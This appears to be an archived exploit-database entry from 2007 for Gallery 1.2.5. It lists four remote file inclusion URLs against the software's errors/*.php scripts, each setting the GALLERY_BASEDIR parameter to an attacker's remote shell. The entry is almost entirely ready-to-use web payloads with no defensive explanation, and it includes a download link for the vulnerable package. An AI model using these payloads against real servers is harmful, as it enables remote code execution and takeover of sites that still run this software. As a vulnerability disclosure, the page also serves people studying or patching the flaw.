Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Gallery 1.2.5 (GALLERY_BASEDIR) Multiple RFI Vulnerabilities
# Published : 2007-04-15
# Author : GoLd_M
# Previous Title : NMDeluxe 1.0.1 (footer.php template) Local File Inclusion Exploit
# Next Title : audioCMS arash 0.1.4 (arashlib_dir) Remote File Inclusion Vulnerabilities

# Gallery 1.2.5 <= Remote File Include Vulnerablites
# D.Script: http://www.gnu-darwin.org/packages/x86/www/gallery-1.2.5.tgz
# Exploit:[Path]/errors/needinit.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/reconfigure.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/unconfigured.php?GALLERY_BASEDIR=Shell
# Exploit:[Path]/errors/configmode.php?GALLERY_BASEDIR=Shell

# www.Syue.com [2007-04-15]